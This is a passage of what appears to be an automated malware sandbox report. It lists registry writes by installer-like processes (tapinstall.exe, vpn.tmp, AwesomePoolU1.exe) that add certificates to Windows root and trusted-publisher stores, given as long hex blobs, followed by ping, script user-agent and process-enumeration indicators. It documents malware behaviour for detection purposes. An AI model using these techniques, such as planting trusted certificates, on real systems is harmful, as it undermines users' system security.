8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118 AwesomePoolU1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b06010505070308620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d81436247f0000000100000016000000301406082b0601050507030906082b060105050703011400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000007e00000001000000080000000000cf97a737d6010300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 AwesomePoolU1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181187e00000001000000080000000000cf97a737d6010b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded37f0000000100000016000000301406082b0601050507030906082b06010505070301620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d814362409000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 AwesomePoolU1.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 2124 PING.EXE 240 PING.EXE 4380 PING.EXE -
Script User-Agent 10 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 173 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 361 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 365 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 452 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 113 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 181 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 439 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 680 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 685 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
key.exemultitimer.exefile.exeCDB6.tmp.exepid process 3136 key.exe 3136 key.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 